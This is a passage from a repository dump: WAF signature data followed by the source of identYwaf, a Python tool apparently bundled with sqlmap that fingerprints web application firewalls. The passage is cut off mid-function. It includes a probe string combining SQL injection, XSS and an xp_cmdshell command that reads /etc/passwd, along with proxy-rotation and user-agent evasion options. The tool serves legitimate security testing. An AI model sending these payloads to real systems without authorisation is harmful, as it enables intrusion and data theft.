\"dbfe:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRXg1qQJLX2uhdOnthtOj+hXrAB16FcPxJPdLsXomtKaK59nui7c4RmkgI2FZjxtDtAeq6c3qA5chW1XaTC\",\n                \"5b85:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMr2RXg1uQJLX2uhdOnthtOj+hXrAB16FcPxJPdLsXomtKaK59nui7c4RmkgI2FZjxtDtAeq+c3qA5chW1XaTD\",\n                \"f806:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRXg1qQJLX2uhdOnthtOj+hX7AB16FcPxJPdLsXomtKaK59nui7c4RmkgI2FZjxtDtAeq6c3qA4chW1XaTC\",\n                \"0f0d:RVZXum61OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRXg1qQJLX2uhdOnthtOj+hXrAB16FcPxJPdLsXomtKaK59nui7c4RmkwI3FZjxtDtAeq6c3qA4chW1XaTC\",\n                \"b13e:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRXg1qQJbX3uhdOnthtOj+hXrAB16FcPxJPdLsXomtKaK59nui7c4RmkgI2FZjxtDtAeq6c3qA4chW1XaTC\",\n                \"40eb:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRXg1qQJLX2uhdOnthtOj+hXrAB16BcPxJPdLsXomtKaK59nui7c4RmkgI2FZjxtDtAeq6c3qA4chW1XaTC\",\n                \"93cd:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRXg1qQJLX2uhdOnthtOj+hXrAB16FcPxJPdLsXomtKaK59nui7c4RmkgI2FZjxtDtAeq6c3qA4chS1XKTC\",\n                \"ba7d:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRXg1qQJLX2uhdOnthtOj+hXrAB16FcPxJPdLsXomtKaK59nui7c4RmkgI2FZjxtDtAeq6c3qA4chW1XKTC\"\n            ]\n        },\n        \"wts\": {\n            \"company\": \"WTS\",\n            \"name\": \"WTS\",\n            \"regex\": \"Server: wts/|>WTS\\\\-WAF\",\n            \"signatures\": [\n                \"e94f:RVZXum61OElCWapAYKYPkoJzWOpohM4JiUcMr2RXg1uQJLX3uhdOnthtOj+hX7AB16FcPhJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c3qA4chW1XKTC\",\n                \"12ce:RVZXum61OElCWapAYKYPkoJzWOpohM4IiUYMr2RWg1uQJLX3uhdOnthtOj+hX7AB16FcPhJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c3qA4chW1XKTC\"\n            ]\n        },\n        \"yundun\": {\n            \"company\": \"Yundun\",\n            \"name\": \"Yundun\",\n            \"regex\": \"Blocked by YUNDUN Cloud WAF|yundun\\\\.com/yd_http_error/\",\n            \"signatures\": [\n                \"4853:RVZXum61OEhCWapBYKcPk4JzWOtohM4JiUcMr2RXg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4RmkgI2FZjxtDtAeq+c36A5chW1XaTC\"\n            ]\n        },\n        \"yunsuo\": {\n            \"company\": \"Yunsuo\",\n            \"name\": \"Yunsuo\",\n            \"regex\": \"yunsuo_session|<img class=\\\\\\\"yunsuologo\\\\\\\"\",\n            \"signatures\": [\n                \"441b:RVZXum60OEhCWKpAYKYPkoJzWOtohM4JiUcMr2RXg1uQJbX3uhdOnthsOj+hX7AA16FcPxJOdLoXomtKaK59nui7c4VmkgI2FZjxtDtAeq+c3qA4chW1XKTC\",\n                \"e795:RVZXum60OEhCWKpAYKYPkoJzWOpohM4JiUcMr2RXg1uQJbX3uhdOnthsOj+hX7AB16FcPhJPdLsXomtKaK59nui7c4RmkgI2FZjxtDtAeq+c3qA4chW1XaTC\",\n                \"7b8e:RVZXum60OEhCWKpAYKYPkoJzWOpohM4JiUcMr2RXg1uQJbX3uhdOnthsOj+hX7AA16FcPhJOdLoXomtKaK59nui7c4RmkgI2FZjxtDtAeq+c3qA4chW1XKTC\"\n            ]\n        },\n        \"zenedge\": {\n            \"company\": \"Zenedge\",\n            \"name\": \"Zenedge\",\n            \"regex\": \"(?s)Server: ZENEDGE.+?<div class=\\\\\\\"number\\\\\\\">403</div>\",\n            \"signatures\": [\n                \"a8fb:RVdXu260OEhCWapBYKcPk4JzWOpohM4JiUcMr2RXg1uQJbX3uhdOn9htOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4VmkwI2FZnxtDtBeq+c36A4chW1XaTD\",\n                \"ba3d:RVdXu260OEhCWapBYKcPk4JzWOpohM4JiUcMr2RXg1uQJbX3uhdOn9htOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4VmkwI2FZjxtDtAeq+c36A4chW1XaTD\"\n            ]\n        }\n    }\n}\n"
  },
  {
    "path": "sqlmap/thirdparty/identywaf/identYwaf.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2019-2021 Miroslav Stampar (@stamparm), MIT\nSee the file 'LICENSE' for copying permission\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\"\"\"\n\nfrom __future__ import print_function\n\nimport base64\nimport codecs\nimport difflib\nimport json\nimport locale\nimport optparse\nimport os\nimport random\nimport re\nimport ssl\nimport socket\nimport string\nimport struct\nimport sys\nimport time\nimport zlib\n\nPY3 = sys.version_info >= (3, 0)\n\nif PY3:\n    import http.cookiejar\n    import http.client as httplib\n    import urllib.request\n\n    build_opener = urllib.request.build_opener\n    install_opener = urllib.request.install_opener\n    quote = urllib.parse.quote\n    urlopen = urllib.request.urlopen\n    CookieJar = http.cookiejar.CookieJar\n    ProxyHandler = urllib.request.ProxyHandler\n    Request = urllib.request.Request\n    HTTPCookieProcessor = urllib.request.HTTPCookieProcessor\n\n    xrange = range\nelse:\n    import cookielib\n    import httplib\n    import urllib\n    import urllib2\n\n    build_opener = urllib2.build_opener\n    install_opener = urllib2.install_opener\n    quote = urllib.quote\n    urlopen = urllib2.urlopen\n    CookieJar = cookielib.CookieJar\n    ProxyHandler = urllib2.ProxyHandler\n    Request = urllib2.Request\n    HTTPCookieProcessor = urllib2.HTTPCookieProcessor\n\nNAME = \"identYwaf\"\nVERSION = \"1.0.131\"\nBANNER = r\"\"\"\n                                   ` __ __ `\n ____  ___      ___  ____   ______ `|  T  T` __    __   ____  _____ \nl    j|   \\    /  _]|    \\ |      T`|  |  |`|  T__T  T /    T|   __|\n |  T |    \\  /  [_ |  _  Yl_j  l_j`|  ~  |`|  |  |  |Y  o  ||  l_\n |  | |  D  YY    _]|  |  |  |  |  `|___  |`|  |  |  ||     ||   _|\n j  l |     ||   [_ |  |  |  |  |  `|     !` \\      / |  |  ||  ] \n|____jl_____jl_____jl__j__j  l__j  `l____/ `  \\_/\\_/  l__j__jl__j  (%s)%s\"\"\".strip(\"\\n\") % (VERSION, \"\\n\")\n\nRAW, TEXT, HTTPCODE, SERVER, TITLE, HTML, URL = xrange(7)\nCOOKIE, UA, REFERER = \"Cookie\", \"User-Agent\", \"Referer\"\nGET, POST = \"GET\", \"POST\"\nGENERIC_PROTECTION_KEYWORDS = (\"rejected\", \"forbidden\", \"suspicious\", \"malicious\", \"captcha\", \"invalid\", \"your ip\", \"please contact\", \"terminated\", \"protected\", \"unauthorized\", \"blocked\", \"protection\", \"incident\", \"denied\", \"detected\", \"dangerous\", \"firewall\", \"fw_block\", \"unusual activity\", \"bad request\", \"request id\", \"injection\", \"permission\", \"not acceptable\", \"security policy\", \"security reasons\")\nGENERIC_PROTECTION_REGEX = r\"(?i)\\b(%s)\\b\"\nGENERIC_ERROR_MESSAGE_REGEX = r\"\\b[A-Z][\\w, '-]*(protected by|security|unauthorized|detected|attack|error|rejected|allowed|suspicious|automated|blocked|invalid|denied|permission)[\\w, '!-]*\"\nWAF_RECOGNITION_REGEX = None\nHEURISTIC_PAYLOAD = \"1 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert(\\\"XSS\\\")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#\"  # Reference: https://github.com/sqlmapproject/sqlmap/blob/master/lib/core/settings.py\nPAYLOADS = []\nSIGNATURES = {}\nDATA_JSON = {}\nDATA_JSON_FILE = os.path.join(os.path.dirname(__file__), \"data.json\")\nMAX_HELP_OPTION_LENGTH = 18\nIS_TTY = sys.stdout.isatty()\nIS_WIN = os.name == \"nt\"\nCOLORIZE = not IS_WIN and IS_TTY\nLEVEL_COLORS = {\"o\": \"\\033[00;94m\", \"x\": \"\\033[00;91m\", \"!\": \"\\033[00;93m\", \"i\": \"\\033[00;95m\", \"=\": \"\\033[00;93m\", \"+\": \"\\033[00;92m\", \"-\": \"\\033[00;91m\"}\nVERIFY_OK_INTERVAL = 5\nVERIFY_RETRY_TIMES = 3\nMIN_MATCH_PARTIAL = 5\nDEFAULTS = {\"timeout\": 10}\nMAX_MATCHES = 5\nQUICK_RATIO_THRESHOLD = 0.2\nMAX_JS_CHALLENGE_SNAPLEN = 120\nENCODING_TRANSLATIONS = {\"windows-874\": \"iso-8859-11\", \"utf-8859-1\": \"utf8\", \"en_us\": \"utf8\", \"macintosh\": \"iso-8859-1\", \"euc_tw\": \"big5_tw\", \"th\": \"tis-620\", \"unicode\": \"utf8\", \"utc8\": \"utf8\", \"ebcdic\": \"ebcdic-cp-be\", \"iso-8859\": \"iso8859-1\", \"iso-8859-0\": \"iso8859-1\", \"ansi\": \"ascii\", \"gbk2312\": \"gbk\", \"windows-31j\": \"cp932\", \"en\": \"us\"}  # Reference: https://github.com/sqlmapproject/sqlmap/blob/master/lib/request/basic.py\nPROXY_TESTING_PAGE = \"https://myexternalip.com/raw\"\n\nif COLORIZE:\n    for _ in re.findall(r\"`.+?`\", BANNER):\n        BANNER = BANNER.replace(_, \"\\033[01;92m%s\\033[00;49m\" % _.strip('`'))\n    for _ in re.findall(r\" [Do] \", BANNER):\n        BANNER = BANNER.replace(_, \"\\033[01;93m%s\\033[00;49m\" % _.strip('`'))\n    BANNER = re.sub(VERSION, r\"\\033[01;91m%s\\033[00;49m\" % VERSION, BANNER)\nelse:\n    BANNER = BANNER.replace('`', \"\")\n\n_ = random.randint(20, 64)\nDEFAULT_USER_AGENT = \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; %s; rv:%d.0) Gecko/20100101 Firefox/%d.0\" % (NAME, _, _)\nHEADERS = {\"User-Agent\": DEFAULT_USER_AGENT, \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"identity\", \"Cache-Control\": \"max-age=0\"}\n\noriginal = None\noptions = None\nintrusive = None\nheuristic = None\nchained = False\nlocked_code = None\nlocked_regex = None\nnon_blind = set()\nseen = set()\nblocked = []\nservers = set()\ncodes = set()\nproxies = list()\nproxies_index = 0\n\n_exit = sys.exit\n\ndef exit(message=None):\n    if message:\n        print(\"%s%s\" % (message, ' ' * 20))\n    _exit(1)\n\ndef retrieve(url, data=None):\n    global proxies_index\n\n    retval = {}\n\n    if proxies:\n        while True:\n            try:\n                opener = build_opener(ProxyHandler({\"http\": proxies[proxies_index], \"https\": proxies[proxies_index]}))\n                install_opener(opener)\n                proxies_index = (proxies_index + 1) % len(proxies)\n                urlopen(PROXY_TESTING_PAGE).read()\n            except KeyboardInterrupt:\n                raise\n            except:\n                pass\n            else:\n                break\n\n    try:\n        req = Request(\"\".join(url[_].replace(' ', \"%20\") if _ > url.find('?') else url[_] for _ in xrange(len(url))), data, HEADERS)\n        resp = urlopen(req, timeout=options.timeout)\n        retval[URL] = resp.url\n        retval[HTML] = resp.read()\n        retval[HTTPCODE] = resp.code\n        retval[RAW] = \"%s %d %s\\n%s\\n%s\" % (httplib.HTTPConnection._http_vsn_str, retval[HTTPCODE], resp.msg, str(resp.headers), retval[HTML])\n    except Exception as ex:\n        retval[URL] = getattr(ex, \"url\", url)\n        retval[HTTPCODE] = getattr(ex, \"code\", None)\n        try:\n            retval[HTML] = ex.read() if hasattr(ex, \"read\") else getattr(ex, \"msg\", str(ex))\n        except:\n            retval[HTML] = \"\"\n        retval[RAW] = \"%s %s %s\\n%s\\n%s\" % (httplib.HTTPConnection._http_vsn_str, retval[HTTPCODE] or \"\", getattr(ex, \"msg\", \"\"), str(ex.headers) if hasattr(ex, \"headers\") else \"\", retval[HTML])\n\n    for encoding in re.findall(r\"charset=[\\s\\\"']?([\\w-]+)\", retval[RAW])[::-1] + [\"utf8\"]:\n        encoding = ENCODING_TRANSLATIONS.get(encoding, encoding)\n        try:\n            retval[HTML] = retval[HTML].decode(encoding, errors=\"replace\")\n            break\n        except:\n            pass\n\n    match = re.search(r\"<title>\\s*(?P<result>[^<]+?)\\s*</title>\", retval[HTML], re.I)\n    retval[TITLE] = match.group(\"result\") if match and \"result\" in match.groupdict() else None\n    retval[TEXT] = re.sub(r\"(?si)<script.+?</script>|<!--.+?-->|<style.+?</style>|<[^>]+>|\\s+\", \" \", retval[HTML])\n    match = re.search(r\"(?im)^Server: (.+)\", retval[RAW])\n    retval[SERVER] = match.group(1).strip() if match else \"\"\n    return retval\n\ndef calc_hash(value, binary=True):\n    value = value.encode(\"utf8\") if not isinstance(value, bytes) else value\n    result = zlib.crc32(value) & 0xffff\n    if binary:\n        result = struct.pack(\">H\", result)\n    return result\n\ndef single_print(message):\n    if message not in seen:\n        print(message)\n        seen.add(message)\n\ndef check_payload(payload, protection_regex=GENERIC_PROTECTION_REGEX % '|'.join(GENERIC_PROTECTION_KEYWORDS)):\n    global chained\n    global heuristic\n    global intrusive\n    global locked_code\n    global locked_regex\n\n    time.sleep(options.delay or 0)\n    if options.post:\n        _ = \"%s=%s\" % (\"\".join(random.sample(string.ascii_letters, 3)), quote(payload))\n        intrusive = retrieve(options.url, _)\n    else:\n        _ = \"%s%s%s=%s\" % (options.url, '?' if '?' not in options.url else '&', \"\".join(random.sample(string.ascii_letters, 3)), quote(payload))\n        intrusive = retrieve(_)\n\n    if options.lock and not payload.isdigit():\n        if payload == HEURISTIC_PAYLOAD:\n            match = re.search(re.sub(r\"Server:|Protected by\", \"\".join(random.sample(string.ascii_letters, 6)), WAF_RECOGNITION_REGEX, flags=re.I), intrusive[RAW] or \"\")\n            if match:\n                result = True\n\n                for _ in match.groupdict():\n                    if match.group(_):\n                        waf = re.sub(r\"\\Awaf_\", \"\", _)\n                        locked_regex = DATA_JSON[\"wafs\"][waf][\"regex\"]\n                        locked_code = intrusive[HTTPCODE]\n                        break\n            else:\n                result = False\n\n            if not result:\n                exit(colorize(\"[x] can't lock results to a non-blind match\"))\n        else:\n            result = re.search(locked_regex, intrusive[RAW]) is not None and locked_code == intrusive[HTTPCODE]\n    elif options.string:\n        result = options.string in (intrusive[RAW] or \"\")\n    elif options.code:\n        result = options.code == intrusive[HTTPCODE]\n    else:\n        result = intrusive[HTTPCODE] != original[HTTPCODE] or (intrusive[HTTPCODE] != 200 and intrusive[TITLE] != original[TITLE]) or (re.search(protection_regex, intrusive[HTML]) is not None and re.search(protection_regex, original[HTML]) is None) or (difflib.SequenceMatcher(a=original[HTML] or \"\", b=intrusive[HTML] or \"\").quick_ratio() < QUICK_RATIO_THRESHOLD)\n\n    if not payload.isdigit():\n        if result:\n            if options.debug:\n                print(\"\\r---%s\" % (40 * ' '))\n                print(payload)\n                print(intrusive[HTTPCODE], intrusive[RAW])\n                print(\"---\")\n\n            if intrusive[SERVER]:\n                servers.add(re.sub(r\"\\s*\\(.+\\)\\Z\", \"\", intrusive[SERVER]))\n                if len(servers) > 1:\n                    chained = True\n                    single_print(colorize(\"[!] multiple (reactive) rejection HTTP 'Server' headers detected (%s)\" % ', '.join(\"'%s'\" % _ for _ in sorted(servers))))\n\n            if intrusive[HTTPCODE]:\n                codes.add(intrusive[HTTPCODE])\n                if len(codes) > 1:\n                    chained = True\n                    single_print(colorize(\"[!] multiple (reactive) rejection HTTP codes detected (%s)\" % ', '.join(\"%s\" % _ for _ in sorted(codes))))\n\n            if heuristic and heuristic[HTML] and intrusive[HTML] and difflib.SequenceMatcher(a=heuristic[HTML] or \"\", b=intrusive[HTML] or \"\").quick_ratio() < QUICK_RATIO_THRESHOLD:\n                chained = True\n                single_print(colorize(\"[!] multiple (reactive) rejection HTML responses detected\"))\n\n    if payload == HEURISTIC_PAYLOAD:\n        heuristic = intrusive\n\n    return result\n\ndef colorize(message):\n    if COLORIZE:\n        message = re.sub(r\"\\[(.)\\]\", lambda match: \"[%s%s\\033[00;49m]\" % (LEVEL_COLORS[match.group(1)], match.group(1)), message)\n\n        if any(_ in message for _ in (\"rejected summary\", \"challenge detected\")):\n            for match in re.finditer(r\"[^\\w]'([^)]+)'\" if \"rejected summary\" in message else r\"\\('(.+)'\\)\", message):\n                message = message.replace(\"'%s'\" % match.group(1), \"'\\033[37m%s\\033[00;49m'\" % match.group(1), 1)\n        else:\n            for match in re.finditer(r\"[^\\w]'([^']+)'\", message):\n                message = message.replace(\"'%s'\" % match.group(1), \"'\\033[37m%s\\033[00;49m'\" % match.group(1), 1)\n\n        if \"blind match\" in message:\n            for match in re.finditer(r\"\\(((\\d+)%)\\)\", message):\n                message = message.replace(match.group(1), \"\\033[%dm%s\\033[00;49m\" % (92 if int(match.group(2)) >= 95 else (93 if int(match.group(2)) > 80 else 90), match.group(1)))\n\n        if \"hardness\" in message:\n            for match in re.finditer(r\"\\(((\\d+)%)\\)\", message):\n                message = message.replace(match.group(1), \"\\033[%dm%s\\033[00;49m\" % (95 if \" insane \" in message else (91 if \" hard \" in message else (93 if \" moderate \" in message else 92)), match.group(1)))\n\n    return message\n\ndef parse_args():\n    global options\n\n    parser = optparse.OptionParser(version=VERSION)\n    parser.add_option(\"--delay\", dest=\"delay\", type=int, help=\"Delay (sec) between tests (default: 0)\")\n    parser.add_option(\"--timeout\", dest=\"timeout\", type=int, help=\"Response timeout (sec) (default: 10)\")\n    parser.add_option(\"--proxy\", dest=\"proxy\", help=\"HTTP proxy address (e.g. \\\"http://127.0.0.1:8080\\\")\")\n    parser.add_option(\"--proxy-file\", dest=\"proxy_file\", help=\"Load (rotating) HTTP(s) proxy list from a file\")\n    parser.add_option(\"--random-agent\", dest=\"random_agent\", action=\"store_true\", help=\"Use random HTTP User-Agent header value\")\n    parser.add_option(\"--code\", dest=\"code\", type=int, help=\"Expected HTTP code in rejected responses\")\n    parser.add_option(\"--string\", dest=\"string\", help=\"Expected string in rejected responses\")\n    parser.add_option(\"--post\", dest=\"post\", action=\"store_true\", help=\"Use POST body for sending payloads\")\n    parser.add_option(\"--debug\", dest=\"debug\", action=\"store_true\", help=optparse.SUPPRESS_HELP)\n    parser.add_option(\"--fast\", dest=\"fast\", action=\"store_true\", help=optparse.SUPPRESS_HELP)\n    parser.add_option(\"--lock\", dest=\"lock\", action=\"store_true\", help=optparse.SUPPRESS_HELP)\n\n    # Dirty hack(s) for help message\n    def _(self, *args):\n        retval = parser.formatter._format_option_strings(*args)\n        if len(retval) > MAX_HELP_OPTION_LENGTH:\n            retval = (\"%%.%ds..\" % (MAX_HELP_OPTION_LENGTH - parser.formatter.indent_increment)) % retval\n        return retval\n\n    parser.usage = \"python %s <host|url>\" % parser.usage\n    parser.formatter._format_option_strings = parser.formatter.format_option_strings\n    parser.formatter.format_option_strings = type(parser.formatter.format_option_strings)(_, parser)\n\n    for _ in (\"-h\", \"--version\"):\n        option = parser.get_option(_)\n        option.help = option.help.capitalize()\n\n    try:\n        options, _ = parser.parse_args()\n    except SystemExit:\n        raise\n\n    if len(sys.argv) > 1:\n        url = sys.argv[-1]\n        if not url.startswith(\"http\"):\n            url = \"http://%s\" % url\n        options.url = url\n    else:\n        parser.print_help()\n        raise SystemExit\n\n    for key in DEFAULTS:\n        if getattr(options, key, None) is None:\n            setattr(options, key, DEFAULTS[key])\n\ndef load_data():\n    global WAF_RECOGNITION_REGEX\n\n    if os.path.isfile(DATA_JSON_FILE):\n        with codecs.open(DATA_JSON_FILE, \"rb\", encoding=\"utf8\") as f:\n            DATA_JSON.update(json.load(f))\n\n        WAF_RECOGNITION_REGEX = \"\"\n        for waf in DATA_JSON[\"wafs\"]:\n            if DATA_JSON[\"wafs\"][waf][\"regex\"]:\n                WAF_RECOGNITION_REGEX += \"%s|\" % (\"(?P<waf_%s>%s)\" % (waf, DATA_JSON[\"wafs\"][waf][\"regex\"]))\n            for signature in DATA_JSON[\"wafs\"][waf][\"signatures\"]:\n                SIGNATURES[signature] = waf\n        WAF_RECOGNITION_REGEX = WAF_RECOGNITION_REGEX.strip('|')\n\n        flags = \"\".join(set(_ for _ in \"\".join(re.findall(r\"\\(\\?(\\w+)\\)\", WAF_RECOGNITION_REGEX))))\n        WAF_RECOGNITION_REGEX = \"(?%s)%s\" % (flags, re.sub(r\"\\(\\?\\w+\\)\", \"\", WAF_RECOGNITION_REGEX))  # patch for \"DeprecationWarning: Flags not at the start of the expression\" in Python3.7\n    else:\n        exit(colorize(\"[x] file '%s' is missing\" % DATA_JSON_FILE))\n\ndef init():\n    os.chdir(os.path.abspath(os.path.dirname(__file__)))\n\n    # Reference: http://blog.mathieu-leplatre.info/python-utf-8-print-fails-when-redirecting-stdout.html\n    if not PY3 and not IS_TTY:\n        sys.stdout = codecs.getwriter(locale.getpreferredencoding())(sys.stdout)\n\n    print(colorize(\"[o] initializing handlers...\"))\n\n    # Reference: https://stackoverflow.com/a/28052583\n    if hasattr(ssl, \"_create_unverified_context\"):\n        ssl._create_default_https_context = ssl._create_unverified_context\n\n    if options.proxy_file:\n        if os.path.isfile(options.proxy_file):\n            print(colorize(\"[o] loading proxy list...\"))\n\n            with codecs.open(options.proxy_file, \"rb\", encoding=\"utf8\") as f:\n                proxies.extend(re.sub(r\"\\s.*\", \"\", _.strip()) for _ in f.read().strip().split('\\n') if _.startswith(\"http\"))\n                random.shuffle(proxies)\n        else:\n            exit(colorize(\"[x] file '%s' does not exist\" % options.proxy_file))\n\n\n    cookie_jar = CookieJar()\n    opener = build_opener(HTTPCookieProcessor(cookie_jar))\n    install_opener(opener)\n\n    if options.proxy:\n        opener = build_opener(ProxyHandler({\"http\": options.proxy, \"https\": options.proxy}))\n        install_opener(opener)\n\n    if options.random_agent:\n        revision = random.randint(20, 64)\n        platform = random.sample((\"X11; %s %s\" % (random.sample((\"Linux\", \"Ubuntu; Linux\", \"U; Linux\", \"U; OpenBSD\", \"U; FreeBSD\"), 1)[0], random.sample((\"amd64\", \"i586\", \"i686\", \"amd64\"), 1)[0]), \"Windows NT %s%s\" % (random.sample((\"5.0\", \"5.1\", \"5.2\", \"6.0\", \"6.1\", \"6.2\", \"6.3\", \"10.0\"), 1)[0], random.sample((\"\", \"; Win64\", \"; WOW64\"), 1)[0]), \"Macintosh; Intel Mac OS X 10.%s\" % random.randint(1, 11)), 1)[0]\n        user_agent = \"Mozilla/5.0 (%s; rv:%d.0) Gecko/20100101 Firefox/%d.0\" % (platform, revision, revision)\n        HEADERS[\"User-Agent\"] = user_agent\n\ndef format_name(waf):\n    return \"%s%s\" % (DATA_JSON[\"wafs\"][waf][\"name\"], (\" (%s)\" % DATA_JSON[\"wafs\"][waf][\"company\"]) if DATA_JSON[\"wafs\"][waf][\"name\"] != DATA_JSON[\"wafs\"][waf][\"company\"] else \"\")\n\ndef non_blind_check(raw, silent=False):\n    retval = False\n    match = re.search(WAF_RECOGNITION_REGEX, raw or \"\")\n    if match:\n        retval = True\n        for _ in match.groupdict():\n            if match.group(_):\n                waf = re.sub(r\"\\Awaf_\", \"\", _)\n                non_blind.add(waf)\n                if not silent:\n                    single_print(colorize(\"[+] non-blind match: '%s'%s\" % (format_name(waf), 20 * ' ')))\n    return retval\n\ndef run():\n    global original\n\n    hostname = options.url.split(\"//\")[-1].split('/')[0].split(':')[0]\n\n    if not hostname.replace('.', \"\").isdigit():\n        print(colorize(\"[i] checking hostname '%s'...\" % hostname))\n        try:\n            socket.getaddrinfo(hostname, None)\n        except socket.gaierror:\n            exit(colorize(\"[x] host '%s' does not exist\" % hostname))\n\n    results = \"\"\n    signature = b\"\"\n    counter = 0\n    original = retrieve(options.url)\n\n    if 300 <= (original[HTTPCODE] or 0) < 400 and original[URL]:\n        original = retrieve(original[URL])\n\n    options.url = original[URL]\n\n    if original[HTTPCODE] is None:\n        exit(colorize(\"[x] missing valid response\"))\n\n    if not any((options.string, options.code)) and original[HTTPCODE] >= 400:\n        non_blind_check(original[RAW])\n        if options.debug:\n            print(\"\\r---%s\" % (40 * ' '))\n            print(original[HTTPCODE], original[RAW])\n            print(\"---\")\n        exit(colorize(\"[x] access to host '%s' seems to be restricted%s\" % (hostname, (\" (%d: '<title>%s</title>')\" % (original[HTTPCODE], original[TITLE].strip())) if original[TITLE] else \"\")))\n\n    challenge = None\n    if all(_ in original[HTML].lower() for _ in (\"eval\", \"<script\")):\n        match = re.search(r\"(?is)<body[^>]*>(.*)</body>\", re.sub(r\"(?is)<script.+?</script>\", \"\", original[HTML]))\n        if re.search(r\"(?i)<(body|div)\", original[HTML]) is None or (match and len(match.group(1)) == 0):\n            challenge = re.search(r\"(?is)<script.+</script>\", original[HTML]).group(0).replace(\"\\n\", \"\\\\n\")\n            print(colorize(\"[x] anti-robot JS challenge detected ('%s%s')\" % (challenge[:MAX_JS_CHALLENGE_SNAPLEN], \"...\" if len(challenge) > MAX_JS_CHALLENGE_SNAPLEN else \"\")))\n\n    protection_keywords = GENERIC_PROTECTION_KEYWORDS\n    protection_regex = GENERIC_PROTECTION_REGEX % '|'.join(keyword for keyword in protection_keywords if keyword not in original[HTML].lower())\n\n    print(colorize(\"[i] running basic heuristic test...\"))\n    if not check_payload(HEURISTIC_PAYLOAD):\n        check = False\n        if options.url.startswith(\"https://\"):\n            options.url = options.url.replace(\"https://\", \"http://\")\n            check = check_payload(HEURISTIC_PAYLOAD)\n        if not check:\n            if non_blind_check(intrusive[RAW]):\n                exit(colorize(\"[x] unable to continue due to static responses%s\" % (\" (captcha)\" if re.search(r\"(?i)captcha\", intrusive[RAW]) is not None else \"\")))\n            elif challenge is None:\n                exit(colorize(\"[x] host '%s' does not seem to be protected\" % hostname))\n            else:\n                exit(colorize(\"[x] response not changing without JS challenge solved\"))\n\n    if options.fast and not non_blind:\n        exit(colorize(\"[x] fast exit because of missing non-blind match\"))\n\n    if not intrusive[HTTPCODE]:\n        print(colorize(\"[i] rejected summary: RST|DROP\"))\n    else:\n        _ = \"...\".join(match.group(0) for match in re.finditer(GENERIC_ERROR_MESSAGE_REGEX, intrusive[HTML])).strip().replace(\"  \", \" \")\n        print(colorize((\"[i] rejected summary: %d ('%s%s')\" % (intrusive[HTTPCODE], (\"<title>%s</title>\" % intrusive[TITLE]) if intrusive[TITLE] else \"\", \"\" if not _ or intrusive[HTTPCODE] < 400 else (\"...%s\" % _))).replace(\" ('')\", \"\")))\n\n    found = non_blind_check(intrusive[RAW] if intrusive[HTTPCODE] is not None else original[RAW])\n\n    if not found:\n        print(colorize(\"[-] non-blind match: -\"))\n\n    for item in DATA_JSON[\"payloads\"]:\n        info, payload = item.split(\"::\", 1)\n        counter += 1\n\n        if IS_TTY:\n            sys.stdout.write(colorize(\"\\r[i] running payload tests... (%d/%d)\\r\" % (counter, len(DATA_JSON[\"payloads\"]))))\n            sys.stdout.flush()\n\n        if counter % VERIFY_OK_INTERVAL == 0:\n            for i in xrange(VERIFY_RETRY_TIMES):\n                if not check_payload(str(random.randint(1, 9)), protection_regex):\n                    break\n                elif i == VERIFY_RETRY_TIMES - 1:\n                    exit(colorize(\"[x] host '%s' seems to be misconfigured or rejecting benign requests%s\" % (hostname, (\" (%d: '<title>%s</title>')\" % (intrusive[HTTPCODE], intrusive[TITLE].strip())) if intrusive[TITLE] else \"\")))\n                else:\n                    time.sleep(5)\n\n        last = check_payload(payload, protection_regex)\n        non_blind_check(intrusive[RAW])\n        signature += struct.pack(\">H\", ((calc_hash(payload, binary=False) << 1) | last) & 0xffff)\n        results += 'x' if last else '.'\n\n        if last and info not in blocked:\n            blocked.append(info)\n\n    _ = calc_hash(signature)\n    signature = \"%s:%s\" % (_.encode(\"hex\") if not hasattr(_, \"hex\") else _.hex(), base64.b64encode(signature).decode(\"ascii\"))\n\n    print(colorize(\"%s[=] results: '%s'\" % (\"\\n\" if IS_TTY else \"\", results)))\n\n    hardness = 100 * results.count('x') // len(results)\n    print(colorize(\"[=] hardness: %s (%d%%)\" % (\"insane\" if hardness >= 80 else (\"hard\" if hardness >= 50 else (\"moderate\" if hardness >= 30 else \"easy\")), hardness)))\n\n    if blocked:\n        print(colorize(\"[=] blocked categories: %s\" % \", \".join(blocked)))\n\n    if not results.strip('.') or not results.strip('x'):\n        print(colorize(\"[-] blind match: -\"))\n\n        if re.search(r\"(?i)captcha\", original[HTML]) is not None:\n            exit(colorize(\"[x] there seems to be an activated captcha\"))\n    else:\n        print(colorize(\"[=] signature: '%s'\" % signature))\n\n        if signature in SIGNATURES:\n            waf = SIGNATURES[signature]\n            print(colorize(\"[+] blind match: '%s' (100%%)\" % format_name(waf)))\n        elif results.count('x') < MIN_MATCH_PARTIAL:\n            print(colorize(\"[-] blind match: -\"))\n        else:\n            matches = {}\n            markers = set()\n            decoded = base64.b64decode(signature.split(':')[-1])\n            for i in xrange(0, len(decoded), 2):\n                part = struct.unpack(\">H\", decoded[i: i + 2])[0]\n                markers.add(part)\n\n            for candidate in SIGNATURES:\n                counter_y, counter_n = 0, 0\n                decoded = base64.b64decode(candidate.split(':')[-1])\n                for i in xrange(0, len(decoded), 2):\n                    part = struct.unpack(\">H\", decoded[i: i + 2])[0]\n                    if part in markers:\n                        counter_y += 1\n                    elif any(_ in markers for _ in (part & ~1, part | 1)):\n    